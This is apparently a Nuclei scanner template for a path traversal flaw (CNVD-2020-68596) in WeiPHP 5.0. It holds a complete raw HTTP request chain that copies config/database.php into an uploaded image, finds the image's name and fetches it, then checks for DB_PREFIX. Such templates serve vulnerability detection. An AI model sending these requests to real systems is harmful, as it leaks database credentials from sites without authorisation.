id: CNVD-2020-68596

info:
  name: WeiPHP 5.0 - Path Traversal
  author: pikpikcu
  severity: high
  description: WeiPHP 5.0 is susceptible to directory traversal attacks.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: cnvd,cnvd2020,weiphp,lfi

http:
  - raw:
      - |
        POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        "1":1
      - |
        GET /public/index.php/home/file/user_pics HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: endpoint
        part: body
        internal: true
        regex:
          - '/public/uploads/picture/(.*.jpg)'
    matchers:
      - type: word
        part: body
        words:
          - https://weiphp.cn
          - WeiPHP
          - DB_PREFIX
        condition: and
# digest: 490a004630440220510a1de2daebb2a7cd068ca47f43ea4d9c42ee75ecf84d60422c38a1b62e92910220712a48b29bb2d311b699983ccc765ab83b4468a09eb60a6ff65aa71d59b18e07:922c64590222798bb761d5b6d8e72950